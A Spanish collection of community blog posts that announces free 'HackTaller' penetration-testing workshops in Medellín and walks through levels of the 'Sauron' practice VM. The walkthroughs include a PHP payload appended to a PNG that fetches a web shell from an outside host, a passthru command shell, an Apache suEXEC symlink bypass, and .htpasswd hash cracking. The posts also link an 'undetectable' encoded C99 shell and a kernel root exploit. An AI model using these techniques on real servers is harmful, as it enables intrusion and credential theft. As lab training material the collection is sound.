Muchas gracias a todos y cada uno de los asistentes, como siempre especialmente a Sebas, Jhony y Jhonatan, que siempre están pendientes de los espacios.

Para este Hack Taller he propuesto una metodología que consiste en una primera sección donde hago una exposición de conceptos, técnicas y tácticas sobre seguridad informática y Test de Penetración que serán últiles y de interés para la segunda parte donde se lleva a cabo un Test de Penetración a un ambiente virtualizado de intrusión.

Dejo entonces el registro fotográfico y el escenario propuesto como primera entrega sobre el desarrollo del Hack Taller.

Escenario Propuesto

El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.

Galería Fotográfica del 6° HackTaller realizado en Medellín
Galería en modo presentación

La idea entonces es hacer todo un ciclo completo de capacitación en común, donde le demos continuidad al mismo.

HackTaller 06 Medellín – Curso de Seguridad Informática
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Fecha: Sabado 29 de Noviembre
Hora: 2:00 pm
Asistentes: Cualquier persona interesada en aprender y compartir conocimiento
Requisitos: Cuaderno de apuntes / Dispositivo de almacenamiento (Preferiblemente igual o superior a 2 gigas)
Únicamente pueden asistir las personas que realicen el respectivo registro por medio electrónico (E-mail a 4v4t4r@gmail.com con el nombre, el registro se lleva a cabo luego de que yo le confirme el puesto por medio de respuesta al e-mail recibido)
Notas aclaratorias: Estos HackTalleres NO TIENEN NINGÚN COSTO
Buena disposición de aprendizaje.

Cupos limitados, +/- 15 personas.

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.

En el transcurso de la semana iré publicando el ambiente virtualizado de intrusión que utilicé para esta sesión, así mismo publicaré los videos de como realizarlo (solo uno de los métodos para realizarlo, pues existen algunos más).

La asistencia fue masiva, pues al completarse el registro para una persona por computador, muchos atendieron a la opción que dí, la cual consistía en que llevaran sus equipos portátiles personales.

Este HackTaller sirvió para entrar en contacto de una manera más práctica con la temática de la seguridad informática, más especificamente con los Test de Intrusión, concientizó a todos los asistentes sobre lo mucho que aún nos falta por aprender y que este espacio y este tipo de eventos nos permitirán mejorar , investigar y desarrollar capacidades cognoscitivas.

El próximo sabado repetiré este mismo HackTaller con las personas que esten interesadas en asistir y que no alcanzaron cupo. El martes confirmo la realización del mismo.

No queda nada más que agradecer a todos los asitentes, como siempre a Jhony y Sebas quienes siempre están pendientes y dispuestos a facilitarme el espacio, a los nuevos amigos del Sena, quienes se hicieron presentes y compartieron de este HackTaller (y que le dirán a fernando que les enseñe todo lo que el sabe), a los compañeros de SoftNet (quienes por amor al arte les toco sentados en el piso con sus laptops) que amablemente ofrecieron algunos dispositivos que poseen en sus trabajos.

A todos los que no pudieron asistir se les extrañó, y espero que puedan hacerlo para el próximo HackTaller

Dejo a continuación el enlace de acceso al registro fotográfico del HackTaller, (no quedé en ninguna foto… ando de fotografo últimamente XD creo que moriré de hambre…)

Galería Fotográfica del 5° HackTaller realizado en Medellín

Galería en modo presentación

Como resultado se decidió realizar una HackTaller en modo de curso en seguridad informática, en el cual se tratarán los diferentes temas relacionados con la seguridad de la información pero desde el principio, o como decimos algunos “Desde 0″.

Aún me encuentro desarrollando todo el contenido temático, pero a modo de “adelanto” les cuento que aprenderemos sobre los siguientes temas entre otros:

- Conceptos básicos en Seguridad Informática
- Seguridad en las Redes
- Seguridad en el Software
- Seguridad en los aplicativos Web
- Test de Penetración
- Normatividad y Estándares
- Informática Forense
- Técnicas antiforenses
- Criptografía
- Vitualización
- Linux
- Programación en C (cliente/servidor)
- Programación en lenguaje ensamblador

La idea entonces es hacer todo un ciclo completo de capacitación en común, donde le demos continuidad al mismo.
Comenzaríamos este próximo sabado 15 de noviembre, y trataría de seguirlo cada 8 o en su defecto cada 15 días, según mi disponibilidad de tiempo.

Resumiendo:
HackTaller 05 Medellín – Curso de Seguridad Informática
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Hora: 2:00 pm
Asistentes: Cualquier persona interesada en aprender y compartir conocimiento
Requisitos: Cuaderno de apuntes / Dispositivo de almacenamiento (Preferiblemente igual o superior a 2 gigas)
Únicamente pueden asistir las personas que realicen el respectivo registro por medio electrónico (E-mail a 4v4t4r (en) gmail.com con el nombre, el registro se lleva a cabo luego de que yo le confirme el puesto por medio de respuesta al e-mail recibido)
Notas aclaratorias: Estos HackTalleres NO TIENEN NINGÚN COSTO
Pueden asistir todas las personas que confirmen su interés en participar.
Buena disposición de aprendizaje.

Cupos limitados, +/- 15 personas.

http://comunidad.dragonjar.org/index.php/topic,1328.msg6565.html#msg6565

En el transcurso de la semana iré publicando los diferentes recursos para este laboratorio (imágen del sistema a analizar, herramientas, videos de desarrollo, manuales y documentación).

Por ahora publico el registro fotográfico .

Fotografías del 4° HackTaller en Medellín – Informática Forense

“Un saludo…

Lamento informarles que este próximo sabado se realizan las jornadas institucionales en el ITM, por lo tanto no se permite el ingreso a las sedes.

Por ahora queda aplazado el laboratorio de informática forense, hasta el próximo sabado 18 de octubre.
No contaba con esas jornadas y mucho menos que no se permitiera el ingreso a la sede
Voy a ir publicando entonces el material para que lean y practiquen y podamos avanzar mucho más en el Lab. ”

Hago la invitación a la comunidad en general para que asistan a este cuarto HackTaller en Medellín.
La temática específica será publicada en el transcurso de la semana, pero a nivel general aprenderemos sobre informática forense con un caso práctico.

Día: 18 de octubre de 2008
Hora: 1:30 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10

Recomiendo la lectura del material publicado (Introducción y contenido)

Recuerden que los cupos son limitados y se debe hacer un registro enviando un correo electrónico a (4v4t4r @ gmail.com) y publicando en este post.
Les recuerdo también que estos laboratorios no tienen ningún costo

En este, hace uso de un exploit local que afecta a los kernel 2.6.x – 2.6.24.1.

Descargar el video demostrativo de “rooteo” como solución alternativa al HackTaller 03.
(Video + Exploit) password: www.dragonjar.org

La idea de este primer laboratorio en dicha sede será la de incentivar el estudio e investigación en dicho campo, por esto, los asistentes serán los sysadmin, dba y webmasters de varias instituciones y proyectos

Por esta razón este lab estará un poco limitado en asistencia, pues como digo, la idea es primero mostrar nuestras ideas y proyectos, para poder contar con este espacio para nuestros laboratorios.

Por lo tanto los interesados deben enviarme un correo electrónico a 4v4t4r@gmail.com.
Quiero aclarar que para este primer lab se llevará a cabo el test de pentración a un aplicativo web que hemos realizado en laboratorios anteriores (SAURON), por lo tanto los que estén interesados en llevarlo a cabo pueden asistir, los que ya lo han realizado solo deben esperar hasta el próximo sabado para desarrollar el análisis forense al sistema comprometido.

Una vez realizado este lab, espero continuar realizandolos cada 8 días … (todo depende del interés de la comunidad )

Mejor dicho, la idea es crear un equipo de investigadores en diferentes campos de la seguridad de la información y nada mejor para ello que contar con esta sede para este propósito. (Aula tipo académica, videobeam integrado, ventilación, internet, buenas máquinas, biblioteca, etc.).

Espero entonces los correo electrónicos.

Muchas gracias a los interesados, especialmente a Sebas por su invaluable colaboración con los laboratorios y la comunidad

Tecnosoft – Parque Tecnológico
Boston (antiguo Colegio San José, ahora ITM de Boston)
Cr 31 # 54 – 10
Tel: (574) 4600727 ext 5548

Hora: 1 PM

Se debe confirmar asistencia por correo electrónico, cupos limitados

Materiales: Cuaderno de notas y/o USB

Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 5 publicado por SG6 Labs:

Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR (SecGame: Sauron)(password: www.dragonjar.org).

Herramientas necesarias:

BackTrack, Shell PHP (en nuestro caso, C99), John The Ripper,

Palabras claves (Documentos de interés, Definiciones):

Servidor Web – Apache – .HTACCESS – Comandos habituales en Linux – PHP – Vulnerabilidades – Shell, Shell PHP, Null Byte Injection

El nivel 5 es quizá uno de los momentos menos concretos de todos los que se pueden presentar. Ahora hemos conseguido ser usuarios locales del sistema, podemos ejecutar comandos, leer directorios, ver configuraciones, y podemos, en definitiva, explorar muchísimas posibilidades.

Sin embargo, hay que matizar algo importante, que puede servir para ahorrarnos muchas horas de trabajo inútil: si nos encontramos en un sistema actualizado, sin fallos de seguridad en el kernel y en otros servicios administrativos, es muy difícil, a menos que el administrador haya configurado algo de forma errónea, escalar privilegios directamente, hacia un usuario administrativo. ¿Qué podemos hacer entonces en estas situaciones?

Nuestro objetivo, en estos casos en los que ser “root” o “Administrador” no parece ser inmediato, será extraer la mayor cantidad de información del sistema, obtener el mayor número de cuentas de usuario posibles, etc.

¿Cómo conseguir eso?

Primeramente, en los sistemas que tengan servicios web, nos centraremos en estos, ¿por qué?. Básicamente porque el aislamiento entre usuarios web, es quizá no complicado, pero sí tedioso. Es fácil encontrar escenarios en los que directamente podamos acceder a los directorios de otros usuarios en la web, y leer sus ficheros, porque todas estas carpetas pueden ser leídas por el usuario que ejecuta el servidor web ( apache, httpd, etc ). En otros escenarios los usuarios web estarán aislados usando cgi-wrappers. Y únicamente, en los entornos más avanzados y seguros, cada usuario web poseerá una máquina virtual o un vps, en la que sólo existirá él. En caso de no existir escenario web, otros escenarios posibles son por este orden: ficheros de configuración, ficheros temporales, ficheros de logs y permisos inseguros.

En este escenario que nos ocupa, relativamente común en un entorno de seguridad medio con árbol web (incluso muy común en granjas de servidores web), vamos a ver cómo se puede proceder. Lo primero, saber quiénes son los usuarios.

blindware:x:500:500::/var/www/blindware:/bin/bash
intranet:x:501:501::/var/www/intranet:/bin/bash
developer:x:502:502::/home/developer:/bin/bash

El sistema parece tener 3 usuarios. 2 de ellos, usuarios web, uno de los cuales es el usuario con el que podemos ejecutar comandos, y otro es el usuario “intranet”.

Podemos probar a acceder al directorio del usuario intranet (/var/www/intranet), pero rápidamente nos daremos cuenta, que poco podemos hacer, pues nos deniega el acceso. Incluso si intentamos leer /var/www, obtendremos resultado parecido, puesto que sus permisos son los siguientes:

d–x–x–x 8 root root 4096 May 12 13:52 www

Ésta situación es bastante común, sin embargo, hay un fichero en el sistema que nos será siempre de gran utilidad, y es la configuración del propio Apache, la cual habitualmente se encuentra desprotegida (en este caso dentro de /etc/httpd/httpd.conf).

<VirtualHost *:80>
ServerAdmin blindware@blindware.inc
DocumentRoot /var/www/blindware/htdocs
ServerName www.blindware.inc
SuexecUserGroup blindware blindware
<Directory />
Options Indexes SymLinksIfOwnerMatch ExecCGI
AllowOverride All
</Directory>
</VirtualHost>

<VirtualHost *:80>
ServerAdmin intranet@blindware.inc
DocumentRoot /var/www/intranet/htdocs
ServerName intranet.blindware.inc
SuexecUserGroup intranet intranet
<Directory />
Options Indexes SymLinksIfOwnerMatch ExecCGI
AllowOverride All
</Directory>
</VirtualHost>

De esta configuración, lo primero que extraemos, es que los hosts están aislados mediante Apache suEXEC, lo cual hace que PHP esté configurado para ejecución en modo CGI, en vez de cómo módulo de Apache, y por ello antes necesitábamos permisos de ejecución en los ficheros PHP. Tal y como comentamos con anterioridad, no es recomendable ir reinventando la rueda a cada paso, por ello, la pregunta que nos tenemos que hacer en este punto es: ¿existe algún procedimiento público y documentado que permita sobrepasar los mecanismos de aislamiento de hosts basados en Apache suEXEC?.

Existe, únicamente tenemos que buscar en Google: “apache suexec“, “apache suexec bypass“, o similares y encontraremos un documento denominado “Apache suEXEC Bypass” en el cual se nos detalla de forma bastante extensa los problemas de configuración asociados a éste sistema.

A grandes rasgos, nosotros vamos a sacar lo más interesante del documento, para hacernos una idea de cómo podemos proceder para leer ficheros dentro del directorio web del usuario intranet.

1. Los diferentes hosts virtuales de Apache, mediante suEXEC, lo que consiguen es que cada host ejecute comandos CGI, bajo un usuario diferente. De esta forma, por ejemplo, nosotros ejecutamos comandos con “blindware”, mientras que el vhost intranet, ejecuta comandos con el usuario “intranet”.

2. Esto permite un esquema de aislamiento “relativamente” sencillo.

drwxr-x— 3 blindware apache 4096 nov 25 17:00 blindware
drwxr-x— 3 intranet apache 4096 nov 25 17:00 intranet

Si nos damos cuenta, cada usuario es propietario de su directorio, y ningún otro usuario puede acceder a ellos, a excepción del usuario apache, con el que se ejecuta el servicio web. Esto “garantiza”, que aunque el usuario ejecute comandos en el sistema, ningún usuario podrá acceder al directorio de otro usuario.

3. Esta idea, cuenta con un fallo: el enlace simbólico. Los enlaces simbólicos se pueden establecer sobre ficheros en los que no tenemos permisos. Dicho de otra forma, nosotros como usuario “blindware”, podemos enlazar cualquier fichero del usuario “intranet”, del que conozcamos su existencia.

4. Una vez enlazado el fichero, podremos usar Apache, para leer el enlace simbólico, de esta forma, el enlace simbólico será leido con los permisos de Apache, usuario Apache, y podremos acceder a aquellos directorios a los que Apache tenga acceso, que comúnmente son todos los del árbol web, puesto que debe poder leerlos.

5. Para que el ataque tenga éxito Apache, es así por defecto, debe estar activa la opción FollowSymLinks en Apache. Por el contrario, si la opción que se encuentra activa es SymLinksIfOwnerMatch, el ataque no se podrá realizar, puesto que Apache, únicamente seguirá enlaces que apunten a ficheros propiedad del dueño del enlace.

6. En caso de estar activa la directiva SymLinksIfOwnerMatch, podrá ser modificada por un usuario mediante un fichero .htaccess, siempre que las opciones AllowOverride Options, o AllowOverride All, estén habilitadas.

A priori, parece que nos encontramos en un escenario vulnerable: se usa suEXEC, y aunque se encuentra habilitada la opción SymLinksIfOwnerMatch, también está habilitada la cláusula AllowOverride All. Por tanto, es cuestión de proceder, a través de nuestra shell en PHP según lo que vamos a describir a continuación. Un detalle importante, cuando queramos ejecutar contenido en nuestra shell PHP, cualquier instrucción que incluya caracteres mínimamente extraños, debemos hace uso de URLEncode.

1. Lo primero que queremos hacer es escribir un fichero .htaccess que nos permita aprovecharnos de esta vulnerabilidad. La orden bien pudiera ser esta.

echo “Options -SymLinksIfOwnerMatch +FollowSymLinks” > .htaccess

Pero como sabemos, debe ser URLEncodeada, quedando una cadena, para su ejecución en nuestra shell, como la siguiente:

echo+%22Options+-SymLinksIfOwnerMatch+%2BFollowSymLinks%22+%3E+.htaccess

2. Ahora es cuestión de crear un enlace simbólico, sobre algún contenido que nos interese leer del directorio “intranet”. En este caso, lo más interesante es leer el fichero .htaccess de ese directorio, del que nos garantizamos su existencia, y que además nos impide el acceso al contenido web de http://intranet.blindware.inc.
Creamos pues el enlace simbólico:

ln –s /var/www/intranet/htdocs/.htaccess htaccess

De esta forma, tenemos un enlace directo, en nuestro directorio http://www.blindware.inc/_controlp/htacccess, que una vez visitado nos dará el contenido del fichero:

Options +Indexes
AuthName “Blindware – Intranet Protected”
AuthType Basic
AuthUserFile /var/www/intranet/htdocs/.htpasswd
require valid-user

3. Repetimos el proceso, una vez que conocemos la localización del fichero .htpasswd. Para ello creamos otro enlace simbólico:

ln -s /var/www/intranet/htdocs/.htpasswd htpasswd

De esta forma, creamos un enlace directo, en nuestro directorio http://www.blindware.inc/_controlp/htpasswd, que una vez visitado nos dará el contenido del fichero.

admin:tCPJIYCZjtqF6

4. Tenemos el usuario, y el hash del acceso a intranet.blindware.inc, podemos bien intentar crackearlo, bien seguir intentando la lectura de ficheros contenidos en ese directorio. A priori es un hash DES tradicional, con lo cual podemos intentar romperlo, a ver qué sucede.

Para romper el hash, hacemos uso de la herramienta “john the ripper”, que es con diferencia el crackeador de passwords más conocido de Unix.

$ john htpasswd
guesses: 1 time: 0:00:00:10 (3) c/s: 335628 trying: 132449 – 132498
Loaded 1 password hash (Traditional DES [64/64 BS MMX])
132456 (admin)

Pues ya conocemos el password: 132456 con usuario admin. Lo que nos permite acceder a intranet.blindware.inc y seguir avanzando en la resolución de Sauron. Dentro de 15 días, continuaremos con el siguiente nivel.

Este video tutorial fué desarrollado haciendo uso del solucionario en texto número 4 publicado por SG6 Labs:

Descargar video tutorial de resolución del HackTaller 01 de la Comunidad DragonJAR (SecGame: Sauron)(password: www.dragonjar.org) – Incluye la Shell C99 codificada en base 64 “no detectable”.

Herramientas necesarias:

Shell Linux/BackTrack, Servidor Web (incluido en backtrack-Apache), Shell PHP (en nuestro caso, C99)

Palabras claves (Documentos de interés, Definiciones):

Servidor Web – Apache – PHP – Vulnerabilidades – Comando CAT, Shell, Shell PHP, Null Byte Injection

Este es el aspecto que presenta el nivel 4. Dividido en 4 secciones:

• Información sobre el sistema
• Administración de MySQL mediante MySQL Admin
• Visualización de Estadísticas
• Cambio de parámetros

Sobre la visualización de estadísticas, poco hay que comentar. Ya nos es familiar porque ya hemos accedido a ella, pero desde otro lugar, durante el nivel 2, por tanto no aporta nada a lo que ya conocemos.

Luego existen 2 partes que contienen aplicaciones públicas, por un lado tenemos phpSysInfo, y por otro phpMyAdmin. En la idea original de este juego está el que no sea necesario el uso de fallos en aplicativos públicos para superarlo, siendo así por un motivo bien sencillo: con el paso del tiempo uno o todos los aplicativos que existen instalados en la máquina virtual serán susceptibles de fallos.

No obstante, podemos evaluar la seguridad de estas versiones, y ver que no parecen existir exploits públicos relevantes para las mismas. Existe un XSS en phpSysInfo, poco relevante para una explotación efectiva, al igual que otro en phpMyAdmin. Comentar como apunte que el hecho de que a fecha de hoy no parezcan existir ataques relevantes no quiere decir, evidentemente, que en un futuro no puedan aparecer, e incluso, y dado que son aplicaciones de código abierto, una vez agotadas el resto de vías, es posible que una revisión exhaustiva de su código fuente, y de su ejecución, pueda revelarnos fallos de seguridad no públicos.

Sin embargo, en el caso que nos ocupa, antes de llegar a la revisión de código público, hay que percatarse de la sección “Cambio de parámetros” la cual permite la subida de un fichero al servidor. Ésta *siempre* es una función crítica y debe ser evaluado su riesgo, ya que permitirá al atacante subir algún tipo de contenido a nuestro sistema.

Para el caso que nos ocupa, podemos darnos cuenta que la robustez y codificación de la subida de imágenes es la apropiada:

• Únicamente permite ficheros con extensión PNG
• El tamaño del fichero está limitado a 8KB
• El contenido del fichero debe corresponder con una imagen PNG

Esto hace que no podamos subir un fichero renombrado como .PNG, sino que debamos subir un gráfico PNG, limitado a 8KB, y con extensión PNG. Por tanto, a priori, podemos pensar que no existe posibilidad alguna de explotar ningún fallo. Bien, veremos que no es así.

Lo primero que debemos plantearnos es: ¿en una imagen PNG únicamente puede existir eso?. La respuesta es que no. Nada más sencillo que concatenar al final de un fichero PNG, código ejecutable en formato PHP. Para ello, a partir de una imagen PNG de menos de 8KB y válida para subirla al servidor, hacemos lo siguiente:

$ cat >> img.png
<? phpinfo(); ?>

Para los no familiarizados con UNIX, decir que simplemente hemos añadido al final del fichero ese código PHP. Una vez hecho esto, tendremos un fichero válido, en formato PNG, que contiene al final del mismo un código PHP. Este fichero podrá ser subido al servidor.

¿Y ahora qué?. Ahora queda percatarse de un par de detalles importantes. El primero, ¿cómo se llama el fichero que contiene la imagen?. En este caso, el fichero de imagen es: http://www.blindware.inc/_controlp/image.php, o dicho de otra forma, un fichero PHP se encarga de servir la imagen, de la que aún desconocemos su nombre y ubicación. ¿Cómo podemos saberla?. Pues haciendo uso del error que vimos en el nivel 3 dentro del fichero index.php, que permitía la lectura de ficheros. Con ese error leemos el contenido de image.php:

<? header(“Content-Type: image/png”); readfile(“01.png”); ?>

Por tanto, nuestro fichero subido sabemos que se llama “01.png” y que se encuentra en el mismo directorio de /_controlp/ que el resto de datos. ¿Cómo podemos explotar el fichero con contenido PHP?. En este caso concreto, es cuando se puede apreciar, como la subida de ficheros maximiza el riesgo de otro de los fallos encontrados en el nivel 3. Si recordamos además de leer ficheros mediante el error localizado en index.php, podemos incluir ficheros para ser procesados por PHP desde un error con idéntica explotación localizado en login.php. Al hacerlo obtenemos como resultado de incluir nuestro fichero 01.png manipulado lo siguiente:

Como vemos, el contenido de la instrucción phpinfo() se muestra a continuación de los datos contenidos en la imagen. Esta información puede ser poco relevante, pero para la explotación efectiva únicamente hay que construir un exploit ligeramente más elaborado, que bien pudiera ser el que vamos a comentar a continuación.

El objetivo del exploit es conseguir crear una shell en PHP dentro de esta máquina. Para ello, el código que proponemos incluir dentro de la imagen es el siguiente:

<? copy(“http://ip/shell.txt”,”shell.php”); ?>

Vaya por delante que la explotación se puede realizar de muchas maneras. Nosotros por elegancia, siempre proponemos que el código a incluir en el exploit sea mínimo. En este caso, el exploit únicamente copia una shell remota localizada en shell.txt al servidor victima.

El contenido de shell.txt puede ser el siguiente:

<?
header(“Content-Type: text/plain”);
passthru($_GET[“cmd”);
?>

El objetivo de este script es ejecutar el comando que pasemos como parámetr en la variable “cmd”. De tal forma, si ahora subimos la imagen con el primer código al servidor, y colocamos en la IP de un servidor web que usemos para el ataque el fichero “shell.txt”, debemos conseguir que este se copie al servidor y acceder a él desde la dirección http://www.blindware.inc/_controlp/shell.php

Aquí aparece un problema. Al acceder a esa URL veremos que no aparece nada, y es que hay un detalle importante siempre que subamos contenido ejecutable a un servidor. A priori no sabemos qué permisos serán necesarios para su ejecución, y la función copy lo más probable es que haya creado un fichero con permisos 644. Para ello podemos verificar qué permisos tienen los ficheros php de los que conocemos su existencia. En este caso los ficheros deben tener permisos 755. Por ello tenemos que modificar ligeramente el exploit a incluir dentro del fichero PNG al siguiente:

<? copy(“http://ip/shell.txt”,”shell.php”); chmod(“shell.php”,0755); ?>

Nota: importante colocar un 0 delante del 755, sino no conseguiremos los permisos rwxr-xr-x

Hecho esto, tendremos acceso al sistema de forma remota y habremos superado el nivel, como muestran las siguientes URLs:

http://www.blindware.inc/_controlp/shell.php?cmd=uname%20-a
Linux sauron 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux

http://www.blindware.inc/_controlp/shell.php?cmd=id
uid=500(blindware) gid=500(blindware) groups=500(blindware)

Para este HackTaller se realizará un Test de Intrusión de un Aplicativo Web. No se requiere un nivel de conocimientos avanzados en temas de seguridad, más si en informática en general, nociones básicas de seguridad, programación, linux y principalmente muchos deseos de aprender y compartir conocimiento.

• Identificación de banners
• Enumeración del objetivo
• Escaneo
• Ataques de fuerza bruta
• Escaneo de vulnerabilidades
• Análisis de código fuente
• Injecciones de código y archivos
• Explotación de vulnerabilidades
• etc

Se recomienda además leer los laboratorios que se han publicado en la página, donde se dan algunas definiciones importantes y necesarias para el HackTaller, y donde se hace uso de algunas herramientas imprescindibles para este tipo de prácticas.

• BackTrack
• NetCat
• Nmap – Nmapfe
• Hydra
• etc

El lugar donde se realizará el HackTaller será en la sede oficial de los Laboratorios de la Comunidad DragonJAR, Netmania Media Group.

Hora: 2 pm
Valor: 1.000 pesos la hora por el servicio de computadores disponibles (este precio es el acordado por el administrador del local comercial), el HackTaller se llevará en un mínimo de 5 horas.
Materiales: Deseos de aprender y compartir

Notas aclaratorias: El local comercial ofrece servicios de internet a usuarios regulares, por ello se estableció cobrar las horas en que haremos uso de las máquinas. En ningún momento, yo (4v4t4r), o la Comunidad DragonJAR busca algún tipo de lucro económico con este HackTaller.

Las máquinas, con los sistemas virtualizados, la documentación y las memorias del HackTaller, quedan abiertas y disponibles al público en general para que realicen el laboratorio en los horarios de servicio del local comercial (Lunes a Sabado de 9 am a 10 pm).

IMPORTANTE:
Es necesario realizar previa inscripción al HackTaller enviando un correo electrónico a 4v4t4r@gmail.com (nombre o nick, e-mail de contacto)

Los cupos son bastante limitados así que para este primer HackTaller se tendrá preferencia para usuarios activos de la Comunidad. Además dependiendo de la cantidad de pre-inscritos se considerará hacer dos sesiones, una por la mañana con un grupo de usuarios y una por la tarde con otro grupo.

Ubicación:

Los grupos se irán conformando desde el foro destinado para ello y aquí se plantearán los temas y se llevará registro de los mismos.

Medellin

Pereira

Manizales

Popayán

Neiva

Cali

Bogotá

Ibagué

Perú

Guatemala

Venezuela

Mexico

Argentina

En la ciudad de Medellín se llevó a cabo el primer HackTaller de la Comunidad (Registro del primer HAckTaller en Medellín). Así mismo en la ciudad de Cali varios usuarios de la comunidad llevaron con éxito un laboratorio de seguridad.